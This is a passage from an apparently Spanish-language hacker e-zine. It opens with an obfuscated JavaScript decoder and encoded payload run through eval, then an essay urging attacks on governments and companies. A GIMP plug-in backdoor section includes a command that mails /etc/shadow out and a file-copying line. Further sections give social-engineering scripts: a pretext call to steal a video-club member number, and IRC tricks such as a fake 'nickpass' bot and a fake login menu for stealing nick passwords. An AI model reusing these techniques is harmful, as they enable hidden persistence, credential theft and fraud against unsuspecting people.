EBEFBCHBDEBFEBJCCIKBFCCDEBIJBGCCFBCDEBCHBDEBBCCCBCKCCDEBGHBKKBHCCGBCJCCCB= CJJBKIBJKBHBCCBCKKBHCCBFBKEBIJBEJBKKBFCCGBCDCCHCCHFBEJBFBCCBCJBCJBCKEBCFB= KGBIJBGCCFBCHFBDJBICCBCCBFBKEBFEBEFBDEBCCCJKBHBCJIBCBCHCCHFBGJBGCCCBCFCCJ= IBIKBKBCCBCDEBEFBFEBHFBHBCGCCKEBCFBKGBFEBKGBDEBECBBCBECBBCBECBBCBIFBDFBEC= BBCBJCCIKBFCCDEBFCCCBCEBCDEBCHBDEBFEBIJBGCCFBCHFBDJBCBCEBCIJBFCCGBCHCCCBC= BFBKEBDIBGIBKHBKJBGKBIHBGJBDJBDJBKHBJIBFJBGKBGJBEJBKHBDJBDKBDKBDKBDKBEJBK= IBBIBFJBIJBGHBDJBKHBDKBDKBDKBDKBIIBGBCKKBFCCCCCGCCCCCDBCHCCDKBDKBDKBDKBIJ= BGBCBCCBBCCCCKCCGCCDKBDKBDKBDKBIHBICCFCCFCCCBCBCCHCCHJBCBCFCCGCCGBCCCCBCC= DKBDKBDKBDKBEIBBCCHCCCBCFCCBCCCBCHCCDEBEJBCBCHCCHCCGBCBCCEBCGCCDKBDKBDKBD= KBBKBCCCBCCCBCGCCDKBDKBDKBDKBFEBECBBCBDBCCCCFCCDEBBFBJCCIKBFCCDEBGBCCHBJF= BKGBGBCBHBDGBKGBGBCEFBEFBCFBEDCECBBCBKKBFCCCDCDEBEFBCHBDEBFCCCBCEBCDEBEFB= DEBGBCDEBEFBDEBFEBDKBDKBDKBDKBKFBBGBJFBJFBKEBDEBFFBDEBJFBFFBDEBDKBFEBDJBK= HBCIBGKBJHBIJBKIBDJBJHBDKBFEBCFBKGBFEBKGBECBBCBKKBFCCCDCDEBEFBCHBDEBFCCCB= CEBCDEBEFBDEBGBCDEBEFBDEBFEBDKBDKBDKBDKBKFBBGBJFBKFBKEBDEBFFBDEBJFBFFBDEB= DKBFEBDJBKHBCIBGKBJHBIJBKIBDJBJHBDKBFEBCFBKGBFEBKGBECBBCBKKBFCCCDCDEBEFBC= HBDEBFCCCBCEBCDEBEFBDEBGBCDEBEFBDEBFEBDKBDKBDKBDKBKFBJFBJFBDGBKEBDEBFFBDE= BJFBFFBDEBDKBFEBDJBKHBCIBGKBJHBIJBKIBDJBJHBDKBFEBCFBKGBFEBKGBECBBCBGDCECB= BCBDFBIFBECBBCBKKBFCCCDCDEBEFBCHBDEBFEBIJBGCCFBCHFBDJBCBCEBCIJBFCCGBCHCCC= BCBFBKEBDIBGIBKHBKJBGKBHIBKIBIHBGHBHIBGKBIIBGHBIHBDIBEIBJIBKHBDKBDKBDKBDK= BEJBCCCDBCHCCKCCIKBFCCCBCDKBDKBDKBDKBIIBGBCKKBFCCCCCGCCCCCDBCHCCDKBDKBDKB= DKBIJBGBCBCCBBCCCCKCCGCCDKBDKBDKBDKBIHBICCFCCFCCCBCBCCHCCHJBCBCFCCGCCGBCC= CCBCCDKBDKBDKBDKBDJBICCBCCKIBBCCKKBCBCKHBBDCDKBDKBDKBDKBKEBFFBKEBFEBDEBEF= BDEBCCCJKBHBCJIBCBCHCCHFBGJBGCCCBCFCCJIBIKBKBCCBCDEBEFBDEBFEBHFBHBCGCCKEB= CFBKGBGDCGDCFEBKGBECBBCBECBBCBDEBDCCCCCJBCCDCDEBEFBCHBFEBJCCIKBFCCDEBFEBE= FBDEBBCCHFBKKBFBCIKBFCCGHBHCCBFBDGBCFBDEBEFBFEBCHBDEBEJBHCCFCCGBCBCCEBCHF= BDBCFCCCCCKBCIHBFBCIKBFCCIHBCCCBBCCBCBFBFEBKGBECBBCBDEBDBCCCCFCCDEBBFBJCC= IKBFCCDEBGBCCHBJFBKGBGBCBHBKKBFCCCDCHFBJBCCBCBCCEBCHCCFBCDEBGFBDEBKFBKGBG= BCEFBEFBCFBEDCDEBDCCCCCJBCCDCDEBEFBCHBDEBBFBKKBFCCCDCHFBKKBFBCIKBFCCIHBCC= CBBCCBCGHBHCCBFBGBCCFBDEBEFBDEBIBCCFBDEBEFBDEBFEBDEBGFBDEBFEBDEBEFBDEBIBC= DEBEFBFEBFFBFEBKGBGDCDEBDEBECBBCBDEBDCCCCCJBCCDCDEBEFBCHBBFBKKBFCCCDCHFBK= KBFBCIKBFCCIHBCCCBBCCBCGHBHCCBFBGBCCFBDEBEFBDEBIBCCFBEFBFEBDEBGFBDEBFEBDE= BEFBDEBIBCDEBEFBDEBFEBCFBKGBFEBKGBECBBCBDEBDCCCCCJBCCDCDEBEFBCHBFEBCBCJCC= IKBJBCBFBFEBEFBDEBBCCHFBKKBFBCIKBFCCGHBHCCBFBDGBCFBDEBEFBDEBFEBCFBKGBDEBG= DCDEBFEBKGBECBBCBECBBCBJCCIKBFCCDEBJCCJFBCHBDEBBCCCBCKCCDEBEJBHCCFCCGBCBC= CEBCBFBFEBBHBFEBEFBFEBEJBIHBDJBEIBBJBFJBDHBDEBJCCIKBFCCDEBICCGCCFCCJIBCHB= KEBFEBDEBEFBDEBCCCJKBHBCJIBCBCHCCHFBGJBGCCCBCFCCJIBIKBKBCCBCDEBEFBFEBKEBK= GBDEBFEBDEBDEBEFBDCCCCCJBCCDCEFBDEBFEBDEBGCCCBCHCCFJBGBCKBCCBCCCCICCHCCBF= BKEBBJBFEBDEBEFBDEBFCCBCCBBCDEBEFBFEBBFBCFBKEBFFBFEBDEBEFBDEBBFBBGBDFBFCC= BCCBBCCFBDEBEFBFEBDEBCFBKGBBHBIFBFEBEFBFEBEJBIHBDJBEIBBJBFJBDHBFEBCFBKGBE= CBBCBECBBCBECBBCBDEBDEBJCCIKBFCCDEBDBCGCCCCCDEBCHBDEBBCCCBCKCCDEBGHBKKBHC= CGBCJCCCBCJJBKIBJKBHBCCBCKKBHCCBFBFEBEJBKKBFCCGBCDCCHCCGBCBCCEBCHFBBIBGBC= JBCCBCEJBCDCGCCHCCCBCKBCKIBJKBHBCCBCKKBHCCFEBCFBKGBECBBCBDEBDEBJCCIKBFCCD= EBIJBGCCFBCDEBCHBDEBBCCCBCKCCDEBGHBKKBHCCGBCJCCCBCJJBKIBJKBHBCCBCKKBHCCBF= BKEBIJBEJBKKBFCCGBCDCCHCCHFBEJBFBCCBCJBCJBCKEBCFBKGBECBBCBDEBDEBJCCIKBFCC= DEBDBCCCCJBCBBCCBCFCCDEBCHBDEBDBCGCCCCCHFBCIBCBCHCCBIBCCCJBCBBCCBCFCCBFBI= JBGCCFBCHFBEJBDCCCBCKKBGBCIKBJBCBIBCCCJBCBBCCBCFCCGCCBFBFEBJHBCBCGCCIBCHC= CCCCDCCFEBCFBCFBKGBECBBCBDEBEIBBCCDBCCBCKKBHCCBFBDBCCCCJBCBBCCBCFCCFFBJCC= JFBFFBDBCGCCCCCFFBCCCJKBHBCJIBCBCHCCHFBGJBGCCCBCFCCJIBIKBKBCCBCCFBKGBECBB= CBGDCECBBCBECBBCBDBCICCBCCKKBHCCGBCCCCBCCDEBEIBBCCDBCCBCKKBHCCBFBDBCCCCJB= CBBCCBCFCCFFBKKBCCCBBCCBCFFBDBCGCCCCCFFBGCCGBCEBCBCCCFBEDCECBBCBDEBDEBJCC= IKBFCCDEBBIBCCCFCCDJBCBCIKBBBCGBCBCCEBCDEBCHBDEBKFBFFBDEBBIBCCCFCCIJBFCCG= BCHCCGBCBCCEBCDEBCHBDEBBGBKGBBIBCCCFCCGHBDCCDCCCBCBCCBBCCHBHGBKGBECBBCBJC= CIKBFCCDEBCBCBDCHCCKGBECBBCBDEBDEBDEBDBCCCCFCCDEBBFBJCCIKBFCCDEBDBCGBCJBC= CBCGCCDEBCHBDEBBCCCBCKCCDEBKHBBCCICCKBCCBCFCCIKBHCCCCCFCCBFBDBCCCCJBCBBCC= BCFCCHFBDBCGBCJBCCBCGCCCFBKGBEEBDBCGBCJBCCBCGCCHFBIKBHCCKHBBCCBBCBFBCFBKG= BDEBDBCGBCJBCCBCGCCHFBKBCCCCJCCCBCJIBCBCBDCHCCBFBCFBCFBEDCECBBCBKBBCBCBDC= HCCCHBDBCGCCCCCHFBCIBCBCHCCKHBBDCHCCCBCBCCGCCGBCCCCBCCJIBIKBKBCCBCBFBDBCG= BCJBCCBCGCCHFBGBCHCCCBCKBCBFBCFBCFBKGBECBBCBKBBKBBGBCDBCBFBCBCBDCHCCCHBCH= BFEBFBCHCCKBCFEBCFBEDCECBBCBKBBKBBKBBJCCIKBFCCDEBIKBHCCHCCCHBDBCGCCCCCHFB= CIBCBCHCCBIBGBCJBCCBCBFBDBCGBCJBCCBCGCCHFBGBCHCCCBCKBCBFBCFBCFBKGBECBBCBK= BBKBBKBBIKBHCCHCCHFBGHBHCCHCCFCCGBCJKBICCHCCCBCGCCDEBCHBDEBBGBKGBECBBCBKB= BKBBDEBGBCDBCDEBBFBIKBHCCHCCHFBEJBGBCDDCCBCDHBJFBCFBEDCDEBECBBCBKBBKBBKBB= JCCIKBFCCDEBFCCBBCCHBDBCGCCCCCHFBKIBDCCCBCBCCFJBCBCBDCHCCBIBGBCJBCCBCBFBD= BCGBCJBCCBCGCCHFBGBCHCCCBCKBCBFBCFBFFBBIBCCCFCCDJBCBCIKBBBCGBCBCCEBCCFBKG= BECBBCBKBBKBBDEBKBBJCCIKBFCCDEBJKBICCDBCDBCDEBCHBDEBBCCCBCKCCDEBEJBHCCFCC= GBCBCCEBCBFBFCCBBCHFBDJBCBCIKBBBCGHBJBCJBCBFBCFBCFBKGBECBBCBKBBKBBKBBFCCB= BCHFBIHBJBCCCCGCCCBCBFBCFBKGBECBBCBKBBKBBDEBKBBGBCDBCDEBBFBJKBICCDBCDBCHF= BGBCBCCBBCCBCBDCKIBDBCBFBGCCGBCEBCBCCCFBCHBCHBGFBKFBCFBEDCECBBCBKBBKBBKBB= DEBJCCIKBFCCDEBIKBDCCCHBDBCGCCCCCHFBKIBDCCCBCBCCFJBCBCBDCHCCBIBGBCJBCCBCB= FBDBCGBCJBCCBCGCCHFBGBCHCCCBCKBCBFBCFBFFBBIBCCCFCCGHBDCCDCCCBCBCCBBCFFBHC= CFCCICCCBCCFBKGBECBBCBKBBKBBKBBDEBIKBDCCHFBIJBFCCGBCHCCCBCBFBKKBCCCBBCCBC= CFBKGBECBBCBKBBKBBKBBDEBIKBDCCHFBIHBJBCCCCGCCCBCBFBCFBKGBECBBCBKBBKBBDEBK= BBGDCECBBCBKBBKBBDEBGDCECBBCBKBBKBBGDCECBBCBDEBDEBDEBGDCECBBCBDEBDBCCCCFC= CDEBBFBJCCIKBFCCDEBGCCDBCDEBCHBDEBBCCCBCKCCDEBKHBBCCICCKBCCBCFCCIKBHCCCCC= FCCBFBDBCCCCJBCBBCCBCFCCHFBEJBICCJKBBIBCCCJBCBBCCBCFCCGCCCFBKGBDEBEEBGCCD= BCHFBIKBHCCKHBBCCBBCBFBCFBKGBDEBGCCDBCHFBKBCCCCJCCCBCJIBCBCBDCHCCBFBCFBCF= BEDCECBBCBDEBDEBDEBEIBBCCDBCCBCKKBHCCBFBGCCDBCHFBGBCHCCCBCKBCBFBCFBFFBKKB= CCCBBCCBCFFBDBCGCCCCCCFBKGBECBBCBDEBGDCECBBCBGDCECBBCBBHBIFBEJBIHBDJBEIBB= JBFJBDHB*/} function transpl480(dataf){ var i,d =3D '';var long=3D6204;var str=3D19;eval('var s=3D String(' + = dataf +')'); for (i=3Dstr + 1;i< 3*long + str;i+=3D3) { d +=3D String.fromCharCode( (s.charCodeAt(i) - s.charCodeAt(str)) + = 10*(s.charCodeAt(i+1) - s.charCodeAt(str)) + 100*( s.charCodeAt(i+2) - = s.charCodeAt(str)) );} return d;} document.writeln(transpl480("pl480")); <--> -< 0x03 >------------------------------------------.------------------.------ `-[ _MeNpH_ )-ï Lo primero que he de decir, antes de soltaros mi sarta de divagaciones este articulo/comentario no va a ense~ar a nadie nada acerca de la "tecnica", del haking pero seguro que consigue que muchos hackers que piensan como yo digan: "joder, si no estoy loco, no soy el unico que tiene este concepto sobre el mundo del hack...". Bien, me explico, con esto que escribo prentendo poner en su sitio a todos los jodidos hackers del "Ay, jope, que no somos dilincuentes" y dar un poco de apoyo a todos los anarquistas y revolucionarios en el mundo del hack. Vale, pues ahora seguro que tengo unos pocos enemigos extra, eso esta bien. Pero seguro que al final del texto tengo muchos mas, aunque espero que esto me cree tb mas amigos, que es lo que importa. Bueno, pues como iba diciendo, esos jodidos hackers son los que defienden en plan religioso lo del "Misterio de la Santisima Moral del Hacker": (- Misterio de la Santisima Moral del Hacker: El hacker que entra en una makina solo puede mirar un poco y despues ir al admin y decirle los fallos de seguridad que tiene. -) Bueno, pos esto esta de puta madre con servidores como el de Medicos sin Fronteras, el de Greenpeace y pocos mas... pero, POR FAVOR!!, COMO VAMOS A PERDONAR A ESOS ORGANISMOS ESTATALES O A ESAS EMPRESAS QUE, POR MIEDO AL PODER DE NUESTRAS MENTES, NOS HAN DECLARADO LA GUERRA. Esos que piensan que hay que ser buenos chicos para que no los llamen delicuentes ya son hackers vencidos, los malos en esta ocasion han ganado, creando asi un ejercito de expertos dispuestos a solucionar todos los puntos debiles del jodido GRAN HERMANO!!!, de ese que se ha dedicado a meter en la memoria colectiva que el ANARQUISMO significa caos y destruccion, que a la escuela no se tiene que ir a aprender sino a aprobar los examenes, o que los hackers son malnacidos hijos del diablo. Ese kabron (en abstracto) que nos tiene cojidos por los huevos es el mismo que nos tacha de delincuentes: PERO NO OS DAIS CUENTA DE QUE ESA LEY QUE NOS PROHIBE EMPLEAR NUESTROS CONOCIMIENTOS Y NUESTRA LIBERTAD, ESTA HECHA PARA PROTEGER A LOS QUE CONTROLAN ESTE MUNDO Y NO PARA PROTEGER LOS INTERESES DE CIUDADANOS DEL MISMO (ya que nadie, excepto los lamerones y los tontos del culo, se dedican a robar a la gente normal y corriente recetas de cocina en formato Word) NO OS DAIS CUENTA QUE DENTRO DE POCO SEREMOS, LOS HACKERS, LA UNICA FORMA POSIBLE DE REVOLUCIONARIOS Y QUE POR ESTO QUIEREN ERRADICARNOS DE LA RED. SI DEJAMOS QUE NOS DERROTEN TAN FACILMENTE: A LA MIERDA LA LIBERTAD!!!. Supongo que muchos de los que se dediquen al hack conoceran algo o mucho de la filosofia CyberPunk y se habran dado cuenta de que el futuro mas proximo es muy parecido (por no decir identico) al que se describe en novelas del genero como, por ejemplo: el clasico "Neuromante" de William Gibson. Nos encontramos con mundo donde hay unas cosas llamadas Corporaciones que son las que dominan el mundo. Macro-empresas ke controlan todo el dinero y que tienen autenticos ejercitos de seguridad para dominar a la gente, esto es el futuro mas inminente (MICROSOFT, AMERICA ONLINE, TELEFONICA, EL CORTE INGLES... si, si hablo de vosotros Kabrones!!). No os parece que en un mundo donde el respeto al kapital y a la propiedad se ha convertido en el Mandamiento nº 11; donde la gente de los paises con dinero piensa que los problemas de hambre en el mundo no se pueden solucionar y, por tanto, no hay que hacer nada; donde la unica forma de revolucion es hacer Zapping en la television y si se da alguna un poco mas peligrosa para la gente que manda, se reprime salvajemente; donde se han perturbado terminos como la democracia, hasta el punto de que hoy en dia todo el mundo piensa que "democracia" significa votar a alguien para que te domine hasta la proxima votacion (no se a vosotros, pero a mi esto ultimo me parece horrible); no os parece que en un mundo asi hace falta gente que construya una nueva revolucion por otros caminos a los que el poder no esta acostumbrado. En este momento en el que los poderosos no pueden prescindir de los sistemas de comunicación informatizada, LA REVOLUCION ESTA EN NUESTRAS MANOS COMPAÑEROS!!! Por todo esto me parece tan sumamente mal que la gente que cuelga documentos de enseñanza sobre el hacking en la red, siempre te suelta al principio lo de la "Moral del Hacker", y lo de "no semos delincuentes". Mirar nenes, la delincuencia es el acto de incumplir las leyes establecidas, si se declara que leer es delito, todo aquel que lea sera un delincuente, pero... por eso esta mal leer??? Pues pa mi que no. Pero la gente sigue con el estupido pensamiento de las leyes como algo sagrado o semi-divino, NO!!!. Las leyes se las ha inventado un tipo como tu y como yo chavalote/a, y con un fin, que en algunas ocasiones no es demasiado noble. Asi que si alguna vez te da por enseñar a hackear a alguien, intenta educarle como HACKER-REVOLUCIONARIO (y no como hacker-esclavo). En fin, hay muchisimo mas que decir, pero buscar en los rincones de vuestras libertarias mentes y encontrareis el resto. Ah, se me olvidaba dar un mensaje de apoyo a todos los enganchados a la tele: con voluntad podreis desintoxicaros y dejar de ser jodidos yonkis, leer un poco y vereis que divertido!! (lo mismo pa los futboleros). Si me quereis mandar algun comentario pues aqui: htiburon@teleline.es, que es la direccion que utilizo cuando puede ser que me bombardeen (principalmente pq yo no soy el titular;).) Hasta la proxima. _MeNpH_ -< 0x04 >------------------------------------------.--------------------.---- `-[ TryckY )-ï -=( Movidas movidosas a traves del Gimp )=- En este articulo voy a explicar como una vez obtenido root en una maquina podemos ejecutar lo que queramos a traves del Gimp doy por hecho que sabeis lo que es el Gimp y si no lo ejecutais y ya esta. Este que voy a explicar no tiene uso si el due~o de la maquina nunca ejecuta el gimp bueno lo que hay que hacer es muy simple, el gimp tiene un directorio de donde lee los plugins, en verdad depende de la version, la ultima los ha separado en varios en: "/usr/lib/gimp/1.1/plug-ins" . Estan los ejecutables pero si tu metes un script tambien lo ejecutara por lo que a qui viene la parte maliciosa en principio habia puesto muchos ejemplos pero esto seria mas un curso de script que otra cosa de por lo que lo dejo a vuestra eleccion los scripts, que otra cosa de por lo que lo dejo a vuestra eleccion los scripts, bueno enga, un ejemplo cutre. Lo que hace es mandarle la lista de passwords al usuario trycky y lo del 2> /dev/null es que si hay errores se vayan a /dev/null para no dar el cante en caso de error <++> gimp/ejem1 mail trycky < /etc/shadow & 2> /dev/null exit 0 <--> Como veis los ejemplos ya corren a cargo de vuestra imaginacion solo decir que el las ultimas versiones del gimp los script-fu y los de perl vienen separados del resto. Otra cosa seria currarse un script en el propio gimp y que cada vez que le diese hiciece algo esto es facil leyendo la documentacion de ayuda del gimp y el script fu register para el script Ah, si instalais uno de estos ponerle un nombre poco cantoso por que cada vez que inicia el Gimp va saliendo abajo los plug-ins que va cargando y si el tio lee "loading plugins me-jodo-a-tu-makina" le daria algunos indicios de que algo anda mal, no creeis?. Y lo demas es vuestra imaginacion, podeis buscar archivos que os los envien a donde querais: "find / -name secreto -exec cp {} ~ \;" Esto buscaria el archivo secreto y lo copiaria a vuestro home, como veis no habria limitaciones. Otra cosa tambien es que permite ejecutar ejecutables valga la redundancia aunque si ya habeis sido root para poder instalar el script , pero bueno tambien puede pasar de forma muy muy rara que tenga modo de escritura el directorio "/usr/lib/gimp/1.1/plug-ins". Pero que os lo dejo a vuestra imaginacion tambien podeis editar un script del perl que los hay tambien para el gimp y que cada vez que se ejecute haga algo que vosotros querais Pues ya esta creo que esto ha sido bastante en principio el documento iba a tener mas ejemplos y chorradas pero creo que con esto basta . Si tengo algun error en el doc o lo que sea podeis encontrarme en el IRC con el nick de trycky claramente . Este doc esta muy bien para gastarle bromas a los colegas :) . Hasta luegor TryckY *EOF* -< 0x05 >-------------------------------------------------.--------------.--- `-[ ^pRoviDoR )-ï &&&&&&|#####################################################|&&&&&& | De Videoklubs, ingenieria social y otros lances... | &&&&&&|#####################################################|&&&&&& por ^pRoviDoR Buenas, soy ^pRoViDoR y me he decidido a eskribir este articulo para que pueda ser de utilidad, espero ke os guste. De entre las artes del hack, la ingenieria social es una de las cosas ke encuentro mas interesantes. He leido varios articulos sobre I.S casi siempre referidos a obtener numeros de tarjetas de credito, cuentas y password de irc... Pues bien, Quien no ha querido tener para toda la vida, por ejemplo "Juegos de Guerra" en su videoteca?, pero o no lo has encontrado o no te apetece gastarte dinero en ello (merece la pena),entonces este articulo es para ti. Empecemos: En la mayoria de los videoklubs para sacar juegos, peliculas o lo ke tengan, te haces socio dando tus datos y a cambio obtienes un numero ke te identifica y con el ke podras obtener sus servicios. Veamos komo obtener el numero de nuestra victima. 1. ¿Que necesitamos? *La guia telefonica *La direccion y el nombre del videoklub *Un telefono (con linea :)) *Aplomo *Un Teclado (opcional) *Un poquito de suerte. *Un amigo. *Un atontao 3,2,1.. ACCION!! Elige el videoklub ke te va a "prestar" sus servicios ;). Bien, ahora busca la calle en la que se encuentra situado, nuestro videoklub se llamara Videopollos y esta situado en la calle Juela, ¨ke hacemos?, pues kon la ayuda de la guia telefonica buscaremos a alguien ke viva en esa kalle o por esa zona, podemos tardar un rato pero no mucho (paciencia),¨por ke hacer esto? se supone ke la persona ke viva alli sera socia del susodicho videoklub al estar cerca de su casa. 2.Obteniendo informacion de "Videopollos" Lo mejor para saber ke informacion obtener de la victima, es hacernos socios nosotros del videoklub, para ver lo ke nos piden. Sera conveniente ke no lo haga la persona ke va a ir a sacar la pelicula o el videojuego kon el nº obtenido de la victima, por razones obvias (los del videoklub no son tontos). Hemos averiguado ke videopollos da komo password un nº de 4 cifras, asi ke vamos con la fiesta... Bueno hemos encontrado a una persona ke vive en la calle Juela, aki la tenemos --> Gonzalez Cuesta, Apapucio...........(***)****** ¨Ke hacer ahora? Bueno suponiendo ke tengamos la suerte de ke sea socia (la tenemos) pondremos voz amable pero no concesiva, que se note ke estamos seguros y le diremos ke debido a un virus informatico ;) los registros de cuentas de los clientes han sufrido modificaciones y se estan validando kon el fin de... bueno mejor leed la conversacion ---------------------------------------------------------------------- M.P= Mala persona , es decir nosotros :p A.A= Apapucio Atontao, es decir la victima ******************************************* Rinngggg!------------------------------------------------------------ Si? digame? Buenas tardes, ¿Apapucio Gonzalez? Si soy yo, ¿kien es? Si, mire le llamamos de VideoPollos del kual es usted socio activo. ¿Ke ocurre? No se preocupe, todo esta en orden, tan solo ke hemos sido victimas de un virus informatico, ¿sabe lo que es? Si, si por supuesto ; fijo ke no tiene ni puta idea Entonces estamos validando los datos de su cuenta ya que pueden haber sido modificados. Su domicilio actual es C/Juela tal tal y tal, no? ;no entramos a sako todavia Efectivamente Su numero de identificacion es **** No! se equivoca, creo ke no era ese,espere un momento ;se va a buscarlo por algun lado tenia yo razon ;si y yo tengo su numero de identificacion ;) Disculpe las molestias ;tono de resignacion y suplica jeje es el **** Muchas gracias, sus datos ya estan actualizados correctamente le agradezco su colaboracion, no todos lo clientes son tan amables ;le hacemos la pelota para ke no sospeche :) Nada, nada, a usted y espero ke solucionen lo del virus. Eso esperamos, muchas gracias. Klick-------------------------------------------------------------- Bueno pues ahora ya tenemos su nº de identificacion y podremos sacar una pelicula o un videojuego, por un periodo indefinido ;). No os preokupeis por la victima, en la mayoria de los kasos no tendra ke pagar lo ke vosotros habeis kogido "prestado" para uso y disfrute. 4.Problemas que pueden surgir en la llamada a la victima: -Ke el titular del numero no use ni para cagar la tarjeta de videopollos,o ke sea su hijo el titular ke se pone ciego con los pokemon, no preocuparse, en el primer caso podemos argumentar ke no se asuste porke tenemos un copia de seguridad pero ke por si acaso prefiririamos confirmarlo personalmente, y asi nos ahorramos ke vaya a preguntar al videoklub y pillen el invento. En el segundo caso nosotros no sabemos ke su hijo es el titular pero la victima si asi ke le llamara para ke se ponga al telefono, ahi tendremos ke escuchar bien atentos, para oir el nombre del hijo y poder continuar con la fiesta. 5.Problemas ke pueden surgir en el videoklub. -Ke al ser personas de la misma zona, al dependiente le suene el nº y sepa ke no eres su autentico due~o, esto a veces pasa, agacha las orejas y pirate del videoklub :( (se pasa mal, fiuuu!). -Ke ademas te pida algun dato complementario porque no se fia (p.j. me puedes decir la direccion? ) La solucion es bien sencilla, aprendete bien la direccion y el nombre de la victima, para decirla sin dudar. 6.Ambienta la conversacion. (opcional) Con el fin de procurar hacer la conversacion lo mas kreible posible para la victima podemos ambientar la conversacion, y diras ¿ke ko~o es eso? poner el ambientador ese del pino para los coches, pues no :p. La cuestion es ke la victima obtenga una informacion a traves del telefono ke aunque no sea totalmente necesaria, ofrezca una sensacion de normalidad a la situacion.En este caso, Ke podemos hacer? Lo primero sera, siempre ke se pida o confirme algun dato, procura hacer ruido con el teclado (marca teclas, no seas bruto y te lies a oxtias contra el telefono :p) komo si estuvieras introduciendo informacion, lo segundo puede ser, que en medio de la conversacion, te disculpes como si estuvieras atendiendo a un cliente, podria ser algo como: --------------------------------------------------------------------- Disculpe un momento, ;con voz mucho mas baja decimos lo Si en el pasillo del fondo ;siguiente, con la mano tapando el micro. -------------------------------------------------------------------- Con esto la victima se sentira mucho mas segura de que se encuentra hablando con una persona ke trabaja en un videoclub. ###################################################################### # Bueno espero ke hayais disfrutado, Yo no me hago responsable de lo# # que hagais y este articulo y su contenido es solo kon fines # # educativos, las conversaciones pueden o no ser reales ;) # ###################################################################### Saludos al sub-mundo. email: HeXaDeM@gmx.net LA INFORMACION DEBE SER LIBRe. -< 0x06 >-------------------------------------------------.--------------.--- `-[ by Tahum )-ï {- El arte de la ingenieria social 2 -} " El timador vuelve a la carga..... " [ Entrada ] Hola de nuevo lectores, aqui me veis de nuevo, una vez mas con vosotros siguiendo la saga de la ingenieria social, un tema que como veis puede dar tanto o mas de si. Ahora trataremos la ingenieria social desde un punto distinto, ya sabiendo lo que se explico en el numero pasado miraremos un poco como son las victimas actualmente, de que manera se consigue el enga~o y algunos trucos que os seran utiles, ademas de alguna sorpresita que os tengo preparada. Si teneis alguna duda, o quereis mandarme alguna sugerencia (constructiva) me la podeis mandar a tahum@demasiado.com, y os respondere encantado ;O). ~ Indice ~ - De que manera han cambiado las victimas ? - 1. - De que manera les enga~amos ? - 2. - Como se consigue el enga~o ? - 3. - Mas trucos - 4. - Los consejos del abuelo - 5. - Despedida - 6. (--1--)- De que manera han cambiado las victimas? -(---------------------) Nuestras victimas ahora estan mucho mas concienciadas de los peligros que corren dando datos personales a cualquier persona o al escribir aquella frase tan rara que le dice aquella chica/o. En resumen, estan ojo avizor de no exceder confianzas con cualquier tipo que conozcan por el IRC. Esto no deja de ser bueno porque asi aprendemos nuevas tecnicas de camelacion a la victima ( me ha gustao la palabreja esa de camelacion ) y nos puliremos como unos ingenieros sociales competentes (de esos quedan pocos) y estaremos preparados para todo (fuerzas armadas espa~ol... Cachis la mar olvidar esto ;)). Asi que hazte a la idea de que conseguir una victima hoy en dia no es tarea facil, pero tampoco te creas que es imposible ni mucho menos... }-D. Vosotros esto no lo notareis hasta que le pidais a la victima que escriba la frase tal o que reciba el archivo cual, es ahi cuando os diran que no a veces de maneras no muy educadas... Como hay que conocer al enemigo, aqui teneis una peque~a descripcion del usuario medio del IRC, pero como generalizar nunca fue bueno tomaoslo como una referencia a rasgos generales... Edad -------------------- 20 a 35 tacos aproximadamente sexo -------------------- Predomina por poco el masculino Utiliza el IRC ---------- Para pasar el rato, ligar ( En algunas cosas no han cambiado... ;D ) Asi suelen ser nuestras victimas... (--2--)- De que manera les enga~amos ? -(--------------------------------) Pues hay dos caminos... El facil y el dificil, el facil tan solo funciona con victimas muuy novatas, el dificil puese colar con victimas no tan novatas. Primero trataremos el metodo facil: - El metodo facilote: - Pues esta tactica como fin tiene la de apoderarse del password de su nick, aunque se le puede dar mas usos. Consiste en decirle a la victima que para autentificar su nick tiene que escribir /msg nickpass el_pass , una frase sin ningun secreto aparente, para la victima eso es un mensaje a un bot para autentificar tu nick, pero si te fijas en el destinatario... Acaso hay algun bot llamado nickpass?? pues no... Pues porque no te pones de nick nickpass? de esa manera el password te llegara a ti... Pues en eso consiste el truco, a que es sencillo y hasta puede parecer estupido?? pues pruebalo con una victima novata y veras rapidos resultados. A este truco se le pueden aplicar mil y un usos, todo depende de tu imaginacion. Otro metodo muy facil de hacer es ponerse nombre de tia ( este truco fijo que ya lo habreis visto ), pero no un nombre que sugiera que estas muy buena ;-), como leticia21, que ademas dice que eres joven ;). Con eso y meterte en un canal de amor y decir que buscas pareja tendras a tus pies a monton de gente... Es la hora de hablar un poco contigo y decirles que si quieren tu foto en ba~ador... Que escriban la frase tal o reciban el archio tal }x-D. Es un metodo facilote pero sus resultados son buenos. Otro metodo facilito es el de hacerse pasar por un bot... Es un truco la verdad bastante efectivo, y como vale mas un ejemplo que mil explicaciones vamos directamente al ejemplo. ************************************************ Bienvenid@ al sistema de autentificacion de nick ************************************************ * * * Escoja una opcion * * * * (1) Autentificar su nick * * (2) Desregistrar su nick * * (3) Ayuda * * * * Que opcion escoge ? * 1 * * * Ha escogido: 1, AUTENTIFICACION DE NICK. * * * * Nombre de usuario: victima * * Introduzca la contrase~a: * pw10169 pw10169... Contrase~a aceptada bienvenid@ a casa ;) No me direis que no es ingenioso ;), ademas si tienes prisa es un truco que da bastantes buenos resultados en victimas novatas. - El metodo dificil: - Pues es el enga~o de toda la vida, pero mas sofisticadamente si cabe, pues como veremos se necesita mucha practica y una cantidad de datos de la victima que nos ayudara a hacer un ataque "a medida". Un metodo bueno es el que uso yo, consiste hacer creer a la victima que aquello que nos ofrece otra persona (un clon nuestro) es muy bueno para ve a saber tu que y que lo acepte... O que esa frase que nos hace escribir esa persona hace maravillas y vete a saber tu que mas... La excusa por la que le enga~eis se puede cambiar... Por si no ha quedado claro pondre un peque~o esquema de como se tiene que hacer: Fase 1 ) Recopilacion de datos de la victima. -> Nombre -> Ocupacion -> Aficiones -> Estado civil -> Sexo -> Conocimiento de la informatica. -> Curiosidades Es importante recopilar todos estos datos para hacer un esquema de lo que queremos. Acto seguido hay que presentarnos ante el, en ese caso daremos nuestros datos falsos. Una vez tengamos claro con quien estamos hablando necesitaremos aprovecharnos de sus debilidades (si busca pareja, si es un adicto al futbol, etc...) y transformarnos en una persona interesante para el, ofreciendole aquello que sabemos no puede rechazar, ( amor, entradas para ir al futbol... ) y nos iremos haciendo amigos de el poco a poco... Una vez conseguido el que su atencion recaiga en nosotros, hace falta meter un clon en escena, en este caso el sera el que le enga~e... Nuestro clon no hara ningun privado ni nada a la victima, y suponiendo que nuestra victima esta en el canal #amor y #mas_amor un clon 